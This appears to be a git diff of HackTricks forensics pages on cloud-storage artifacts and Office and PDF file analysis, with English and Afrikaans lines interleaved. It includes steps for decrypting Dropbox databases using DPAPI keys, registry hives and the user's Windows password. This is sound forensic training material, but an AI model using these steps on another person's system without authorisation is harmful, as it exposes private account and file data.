' below lines purpose: checks that write access is possible!
Dim oTxtStream
' below lines purpose: checks that write access is possible!
Dim oTxtStream
On Error Resume Next
Set oTxtStream = oFSO.createTextFile(strPath)
On Error Resume Next
Set oTxtStream = oFSO.createTextFile(strPath)
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
On Error GoTo 0
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
On Error GoTo 0
Set oTxtStream = Nothing
' end check of write access
Set oTxtStream = Nothing
' end check of write access
With oFSO.createTextFile(strPath)
.Write(strBinary)
.Close
End With
With oFSO.createTextFile(strPath)
.Write(strBinary)
.Close
End With
End Function
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

142
forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
View file

@ -1,138 +1,136 @@
# Local Cloud Storage
# Plaaslike Wolklêerstoor
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## OneDrive
In Windows, you can find the OneDrive folder in `\Users\<username>\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files:
In Windows kan jy die OneDrive-vouer vind in `\Users\<gebruikersnaam>\AppData\Local\Microsoft\OneDrive`. En binne `logs\Personal` is dit moontlik om die lêer `SyncDiagnostics.log` te vind wat interessante data bevat oor die gesinkroniseerde lêers:
* Size in bytes
* Creation date
* Modification date
* Number of files in the cloud
* Number of files in the folder
* **CID**: Unique ID of the OneDrive user
* Report generation time
* Size of the HD of the OS
* Grootte in bytes
* Skeppingsdatum
* Wysigingsdatum
* Aantal lêers in die wolk
* Aantal lêers in die vouer
* **CID**: Unieke ID van die OneDrive-gebruiker
* Verslaggenereringstyd
* Grootte van die bedryfstelsel se harde skyf
Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\<CID>.ini**_ and _**\<CID>.dat**_ that may contain interesting information like the names of files synchronized with OneDrive.
Nadat jy die CID gevind het, word dit aanbeveel om **lêers te soek wat hierdie ID bevat**. Jy kan lêers met die naam vind: _**\<CID>.ini**_ en _**\<CID>.dat**_ wat interessante inligting kan bevat, soos die name van lêers wat met OneDrive gesinkroniseer is.
## Google Drive
In Windows, you can find the main Google Drive folder in `\Users\<username>\AppData\Local\Google\Drive\user_default`\
This folder contains a file called Sync\_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5.
In Windows kan jy die hoof Google Drive-vouer vind in `\Users\<gebruikersnaam>\AppData\Local\Google\Drive\user_default`\
Hierdie vouer bevat 'n lêer genaamd Sync\_log.log met inligting soos die e-posadres van die rekening, lêernaam, tydstempels, MD5-hashes van die lêers, ens. Selfs uitgevee lêers verskyn in daardie loglêer met die ooreenstemmende MD5.
The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files.
Die lêer **`Cloud_graph\Cloud_graph.db`** is 'n sqlite-databasis wat die tabel **`cloud_graph_entry`** bevat. In hierdie tabel kan jy die **naam** van die **gesinkroniseerde** **lêers**, gewysigde tyd, grootte en die MD5-kontrolegetal van die lêers vind.
The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version.
Die tabeldata van die databasis **`Sync_config.db`** bevat die e-posadres van die rekening, die pad van die gedeelde vouers en die Google Drive-weergawe.
## Dropbox
Dropbox uses **SQLite databases** to manage the files. In this\
You can find the databases in the folders:
Dropbox gebruik **SQLite-databasisse** om die lêers te bestuur. In hierdie\
Jy kan die databasisse in die volgende vouers vind:
* `\Users\<username>\AppData\Local\Dropbox`
* `\Users\<username>\AppData\Local\Dropbox\Instance1`
* `\Users\<username>\AppData\Roaming\Dropbox`
* `\Users\<gebruikersnaam>\AppData\Local\Dropbox`
* `\Users\<gebruikersnaam>\AppData\Local\Dropbox\Instance1`
* `\Users\<gebruikersnaam>\AppData\Roaming\Dropbox`
And the main databases are:
En die belangrikste databasisse is:
* Sigstore.dbx
* Filecache.dbx
* Deleted.dbx
* Config.dbx
The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
Die ".dbx"-uitbreiding beteken dat die **databasisse** **gekripteer** is. Dropbox gebruik **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/ms995355\(v=msdn.10\)?redirectedfrom=MSDN))
To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
Om die kriptering wat Dropbox gebruik beter te verstaan, kan jy lees [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
However, the main information is:
Die belangrikste inligting is egter:
* **Entropy**: d114a55212655f74bd772e37e64aee9b
* **Salt**: 0D638C092E8B82FC452883F95F355B8E
* **Algorithm**: PBKDF2
* **Iterations**: 1066
* **Entropie**: d114a55212655f74bd772e37e64aee9b
* **Sout**: 0D638C092E8B82FC452883F95F355B8E
* **Algoritme**: PBKDF2
* **Iterasies**: 1066
Apart from that information, to decrypt the databases you still need:
Afgesien van daardie inligting, om die databasisse te ontsluit, het jy steeds nodig:
* The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary)
* The **`SYSTEM`** and **`SECURITY`** hives
* The **DPAPI master keys**: Which can be found in `\Users\<username>\AppData\Roaming\Microsoft\Protect`
* The **username** and **password** of the Windows user
* Die **gekripteerde DPAPI-sleutel**: Jy kan dit in die register vind binne `NTUSER.DAT\Software\Dropbox\ks\client` (voer hierdie data uit as binêr)
* Die **`SYSTEM`** en **`SECURITY`**-bytjies
* Die **DPAPI-hoofsleutels**: Wat gevind kan word in `\Users\<gebruikersnaam>\AppData\Roaming\Microsoft\Protect`
* Die **gebruikersnaam** en **wagwoord** van die Windows-gebruiker
Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:**
Dan kan jy die instrument [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)** gebruik:**
![](<../../../.gitbook/assets/image (448).png>)
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
The resulting hex is the final key used to encrypt the databases which can be decrypted with:
As alles soos verwag verloop, sal die instrument die **primêre sleutel** aandui wat jy moet **gebruik om die oorspronklike sleutel te herstel**. Om die oorspronklike sleutel te herstel, gebruik jy net hierdie [cyber\_chef-resep](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) en plaas die primêre sleutel as die "wagwoord" binne die resep.
Die resulterende heks is die finale sleutel wat gebruik word om die databasisse te kripteer, wat ontsluit kan word met:
```bash
sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
```
Die **`config.dbx`** databasis bevat:
The **`config.dbx`** database contains:
* **E-pos**: Die e-pos van die gebruiker
* **usernamedisplayname**: Die naam van die gebruiker
* **dropbox\_path**: Pad waar die Dropbox-lys geleë is
* **Host\_id: Hash** wat gebruik word om te verifieer by die wolk. Dit kan slegs vanaf die web herroep word.
* **Root\_ns**: Gebruikersidentifiseerder
* **Email**: The email of the user
* **usernamedisplayname**: The name of the user
* **dropbox\_path**: Path where the dropbox folder is located
* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
* **Root\_ns**: User identifier
Die **`filecache.db`** databasis bevat inligting oor al die lêers en vouers wat met Dropbox gesinchroniseer is. Die tabel `File_journal` bevat die meeste nuttige inligting:
The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
* **Server\_path**: Pad waar die lêer binne die bediener geleë is (hierdie pad word voorafgegaan deur die `host_id` van die kliënt).
* **local\_sjid**: Weergawe van die lêer
* **local\_mtime**: Wysigingsdatum
* **local\_ctime**: Skeppingsdatum
* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client).
* **local\_sjid**: Version of the file
* **local\_mtime**: Modification date
* **local\_ctime**: Creation date
Ander tabelle binne hierdie databasis bevat meer interessante inligting:
Other tables inside this database contain more interesting information:
* **block\_cache**: hash of all the files and folders of Dropbox
* **block\_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal`
* **mount\_table**: Share folders of dropbox
* **deleted\_fields**: Dropbox deleted files
* **block\_cache**: hash van al die lêers en vouers van Dropbox
* **block\_ref**: Verbind die hash-ID van die tabel `block_cache` met die lêer-ID in die tabel `file_journal`
* **mount\_table**: Deel vouers van Dropbox
* **deleted\_fields**: Dropbox verwyderde lêers
* **date\_added**
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

53
forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
View file

@ -1,63 +1,58 @@
# Office file analysis
# Kantoorlêer-ontleding
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary:
Vir verdere inligting, kyk na [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Dit is net 'n opsomming:
Microsoft het baie kantoorlêer-formate geskep, met twee hooftipes, naamlik **OLE-formate** (soos RTF, DOC, XLS, PPT) en **Office Open XML (OOXML) formate** (soos DOCX, XLSX, PPTX). Hierdie formate kan makros insluit, wat hulle teikens maak vir hengel en kwaadwillige sagteware. OOXML-lêers is gestruktureer as zip-houers, wat inspeksie deur middel van uitpakkery moontlik maak, waar die lêer- en vouerhiërargie en XML-lêerinhoude onthul word.
Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents.
Om OOXML-lêerstrukture te verken, word die opdrag om 'n dokument uit te pak en die uitsetstruktuur gegee. Tegnieke vir die versteek van data in hierdie lêers is gedokumenteer, wat voortdurende innovasie in data-versteek binne CTF-uitdagings aandui.
To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges.
For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables.
Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`.
Vir ontleding bied **oletools** en **OfficeDissector** omvattende gereedskapstelle vir die ondersoek van beide OLE- en OOXML-dokumente. Hierdie gereedskap help om ingebedde makros te identifiseer en te analiseer, wat dikwels as vektore vir kwaadwillige sagteware-aflewering dien, wat tipies aanvullende skadelike lading aflaai en uitvoer. Analise van VBA-makros kan uitgevoer word sonder Microsoft Office deur gebruik te maak van Libre Office, wat voorsiening maak vir foutopsporing met breekpunte en kykveranderlikes.
Die installasie en gebruik van **oletools** is eenvoudig, met opdragte wat voorsien word vir installasie via pip en die onttrekking van makros uit dokumente. Outomatiese uitvoering van makros word geaktiveer deur funksies soos `AutoOpen`, `AutoExec`, of `Document_Open`.
```bash
sudo pip3 install -U oletools
olevba -c /path/to/document #Extract macros
```
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
</details>

54
forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
View file

@ -1,52 +1,52 @@
# PDF File analysis
# PDF-lêerontleding
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
**For further details check: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)**
**Vir verdere besonderhede, kyk na: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)**
The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami.
Die PDF-formaat is bekend vir sy kompleksiteit en potensiaal om data te verberg, wat dit 'n fokuspunt maak vir CTF-forensiese uitdagings. Dit kombineer plain-tekstelemente met binêre voorwerpe, wat moontlik saamgedruk of versleutel kan wees, en kan skripte in tale soos JavaScript of Flash insluit. Om die PDF-struktuur te verstaan, kan verwys word na Didier Stevens se [inleidende materiaal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), of gebruik maak van hulpmiddels soos 'n teksredigeerder of 'n PDF-spesifieke redigeerder soos Origami.
For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in:
Vir diepgaande verkenning of manipulasie van PDF's is hulpmiddels soos [qpdf](https://github.com/qpdf/qpdf) en [Origami](https://github.com/mobmewireless/origami-pdf) beskikbaar. Versteekte data binne PDF's kan verskuil wees in:
* Invisible layers
* XMP metadata format by Adobe
* Incremental generations
* Text with the same color as the background
* Text behind images or overlapping images
* Non-displayed comments
* Onsigbare lae
* XMP-metadata-formaat deur Adobe
* Inkrementele generasies
* Teks met dieselfde kleur as die agtergrond
* Teks agter beelde of oorvleuelende beelde
* Nie-vertoonde kommentaar
